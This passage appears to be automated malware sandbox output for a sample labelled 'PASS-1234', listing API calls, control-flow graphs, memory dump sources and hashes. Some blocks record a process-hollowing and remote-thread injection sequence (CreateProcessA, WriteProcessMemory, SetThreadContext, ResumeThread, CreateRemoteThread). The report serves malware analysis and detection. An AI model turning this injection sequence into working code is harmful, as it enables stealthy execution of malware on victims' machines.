RegDisablePredefinedCache CloseHandle 50625->50626 50627 d119eb 50626->50627

          Control-flow Graph

          APIs
          • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00E12B34
          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00E12B47
          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00E12B65
          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E12B89
          • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00E12BB4
          • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00E12C0C
          • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00E12C57
          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E12C95
          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00E12CD1
          • ResumeThread.KERNELBASE(?), ref: 00E12CE0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
          • String ID: GetP$Load$aryA$ress
          • API String ID: 2687962208-977067982
          • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
          • Instruction ID: 162ea00f2f018e9c873037b3b61ad0261b1c221518f6d994ec5216b1db9972b0
          • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
          • Instruction Fuzzy Hash: 56B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA51CB94
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 105 d9889b-d988b3 GetPEB 106 d988b5-d988b9 call d03e22 105->106 107 d988c4-d988c6 105->107 110 d988be-d988c2 106->110 109 d988c7-d988cb 107->109 110->107 110->109
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 14e415b92e711a254da3d0c0cf5c829ca26855c7132794785b4899dc4833226d
          • Instruction ID: f572a338c196251fc1cb60d803500b6ea9a75198d5b97bcce46cab8462935d52
          • Opcode Fuzzy Hash: 14e415b92e711a254da3d0c0cf5c829ca26855c7132794785b4899dc4833226d
          • Instruction Fuzzy Hash: 73E08C32911228EBCB14EB8CD94498AF3ECEB45F00B550596B501D3140C670DE00D7F0
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 111 d8542b call d06546 113 d85430-d85433 111->113 114 d8544a-d8544c 113->114 115 d85435-d85445 GetPEB 113->115 115->114 116 d85447-d85449 115->116
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ea396804d05bd86bc06d7de5651e5550b57eee76fc7eff42c2ceb3e19d054474
          • Instruction ID: f2040d26d2b38cd483531ffae922882ec4d9dc965125128e0bda6600589490d7
          • Opcode Fuzzy Hash: ea396804d05bd86bc06d7de5651e5550b57eee76fc7eff42c2ceb3e19d054474
          • Instruction Fuzzy Hash: B6C08C34082D0046CF29A91892B1BA43356E392783F8804CCC4060B686C55E9CC7D732
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • VirtualProtect.KERNELBASE(00E12838,000004AC,00000040,?,?,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00D11987
          • CreateRemoteThread.KERNELBASE(000000FF,00000000,00000000,Function_001129C0,MZx,00000000,?), ref: 00D119C3
          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000001,?,?,?,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00D119D0
          • RegDisablePredefinedCache.ADVAPI32 ref: 00D119D6
          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00D119DD
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: CacheCloseCreateDisableHandleObjectPredefinedProtectRemoteSingleThreadVirtualWait
          • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@$MZx
          • API String ID: 3011204695-4110972614
          • Opcode ID: 69a572e2dc90dfd5478e9459fa9caf134c4c55156bf97297e609c9c170b10880
          • Instruction ID: 65ebb363186e49859bc74660e661ace07d472129f6c641eefba6155dad46ac2f
          • Opcode Fuzzy Hash: 69a572e2dc90dfd5478e9459fa9caf134c4c55156bf97297e609c9c170b10880
          • Instruction Fuzzy Hash: D011D671A01214BFDB20AB659C46FEE77B8EF05750F100229F615F71D1DA60AE0AC7B8
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 41 d8a58b-d8a597 42 d8a629-d8a62c 41->42 43 d8a59c-d8a5ad 42->43 44 d8a632 42->44 46 d8a5ba-d8a5d3 LoadLibraryExW 43->46 47 d8a5af-d8a5b2 43->47 45 d8a634-d8a638 44->45 50 d8a639-d8a649 46->50 51 d8a5d5-d8a5de GetLastError 46->51 48 d8a5b8 47->48 49 d8a652-d8a654 47->49 53 d8a626 48->53 49->45 50->49 52 d8a64b-d8a64c FreeLibrary 50->52 54 d8a5e0-d8a5f2 call d05452 51->54 55 d8a617-d8a624 51->55 52->49 53->42 54->55 58 d8a5f4-d8a606 call d05452 54->58 55->53 58->55 61 d8a608-d8a615 LoadLibraryExW 58->61 61->50 61->55
          APIs
          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 00D8A64C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: FreeLibrary
          • String ID: api-ms-$ext-ms-
          • API String ID: 3664257935-537541572
          • Opcode ID: 171aa3e701ef240197f29006d029ca1571ab3d2ef918a0f58838330015b4dc69
          • Instruction ID: f20839f40171904346de55fbb91274e12c97b39440cbd8f9417cc65f7d07c393
          • Opcode Fuzzy Hash: 171aa3e701ef240197f29006d029ca1571ab3d2ef918a0f58838330015b4dc69
          • Instruction Fuzzy Hash: 7921D832A01A10EFE731AB29EC41A6A7768EB51770F1D0123E946A7295E630ED05CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • GetCurrentProcess.KERNEL32(?,?,00D85367,?,?,?,?,?), ref: 00D853A3
          • TerminateProcess.KERNEL32(00000000,?,00D85367,?,?,?,?,?), ref: 00D853AA
          • ExitProcess.KERNEL32 ref: 00D853BC
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: Process$CurrentExitTerminate
          • String ID:
          • API String ID: 1703294689-0
          • Opcode ID: 875a0dd58090970b77555e5c439af76f9690a32a56ac4fe2e4fff7f217a7b14f
          • Instruction ID: 1a41858e35f2b5700ffa1afbed28ac5a52ff62028e4da5000fc880ac98961f79
          • Opcode Fuzzy Hash: 875a0dd58090970b77555e5c439af76f9690a32a56ac4fe2e4fff7f217a7b14f
          • Instruction Fuzzy Hash: 9ED09E31000904BFCF213F65EC0DD9D3F29EF403827554110B90966075DF719D9BABA4
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 69 d8a688-d8a6b0 70 d8a6b2-d8a6b4 69->70 71 d8a6b6-d8a6b8 69->71 72 d8a707-d8a70a 70->72 73 d8a6ba-d8a6bc 71->73 74 d8a6be-d8a6c5 call d8a58b 71->74 73->72 76 d8a6ca-d8a6ce 74->76 77 d8a6ed-d8a704 76->77 78 d8a6d0-d8a6de GetProcAddress 76->78 80 d8a706 77->80 78->77 79 d8a6e0-d8a6eb call d0442b 78->79 79->80 80->72
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 533dfef3e475fb101dc72b7aefc9ecbb82dd1af301561ae6e6e1baa8c7536339
          • Instruction ID: 052c210a8b06e8a800419ffca8e5afe09d37444c7593c214b5e443b472e6f75f
          • Opcode Fuzzy Hash: 533dfef3e475fb101dc72b7aefc9ecbb82dd1af301561ae6e6e1baa8c7536339
          • Instruction Fuzzy Hash: E8012D377005219FBB25EE6EEC4195A33D6FB843607298122F511DB188EB30DC029761
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00D9BA8B
          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00D9BAB4
          • GetACP.KERNEL32 ref: 00D9BAC9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: InfoLocale
          • String ID: ACP$OCP
          • API String ID: 2299586839-711371036
          • Opcode ID: 51f76612d5df827efc2fe7e8428f752e939fc0dc86fd5989124994aaf842d78c
          • Instruction ID: e254f1fbfcd3c07bfe4a603441ffb27e6fc2f13d4054f266c60633c9c1737dca
          • Opcode Fuzzy Hash: 51f76612d5df827efc2fe7e8428f752e939fc0dc86fd5989124994aaf842d78c
          • Instruction Fuzzy Hash: 4F219D22A00101EADF309F55EB01BA772A6EF54B74B5B8466E84AD7210E7B2DD41C770
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetUserDefaultLCID.KERNEL32 ref: 00D9BD47
          • IsValidCodePage.KERNEL32(00000000), ref: 00D9BD90
          • IsValidLocale.KERNEL32(?,00000001), ref: 00D9BD9F
          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00D9BDE7
          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00D9BE06
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: Locale$InfoValid$CodeDefaultPageUser
          • String ID:
          • API String ID: 3475089800-0
          • Opcode ID: c82e1e5e6893251532ec503c614dbf02be5b3a4bc0841486cfcb4c3ef76f12a6
          • Instruction ID: 08baed293c922b189ab8002e44417c0678b4c95d7daadfb7ab64465908289f00
          • Opcode Fuzzy Hash: c82e1e5e6893251532ec503c614dbf02be5b3a4bc0841486cfcb4c3ef76f12a6
          • Instruction Fuzzy Hash: 4B519071A00219AFDF20DFA5ED41ABE77B8FF04710F1A052AE905E7191EBB09944CB70
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
          • API String ID: 0-2761157908
          • Opcode ID: 81aef6500f38bac9eacc03ed31682d19d6f407374efb0614279316c9abf2efce
          • Instruction ID: 22d7d672e712d3d7af82bb93cec71e14e0e5a0b077907b2756fed2b3747ae824
          • Opcode Fuzzy Hash: 81aef6500f38bac9eacc03ed31682d19d6f407374efb0614279316c9abf2efce
          • Instruction Fuzzy Hash: 6BD23975E092298FDB65CF29CC407EAB7B5EB46304F1841EAD44DE7240E778AE818F61
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetACP.KERNEL32 ref: 00D9B120
          • IsValidCodePage.KERNEL32(00000000), ref: 00D9B14B
          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00D9B32C
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: CodeInfoLocalePageValid
          • String ID: utf8
          • API String ID: 790303815-905460609
          • Opcode ID: addd22c8b0523a9447061db0419c679afbd1506478b4d097ce5bfba7c204d4ea
          • Instruction ID: 7453ef39f6c7925000db5d5099e91ea00c4690d5f402a11f547b0bdcf60e7fd3
          • Opcode Fuzzy Hash: addd22c8b0523a9447061db0419c679afbd1506478b4d097ce5bfba7c204d4ea
          • Instruction Fuzzy Hash: F171F571600302AADF25AB75ED86FAA73A9EF45720F1A006BF509D7181FB70ED4087B5
          Uniqueness

          Uniqueness Score: -1.00%

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
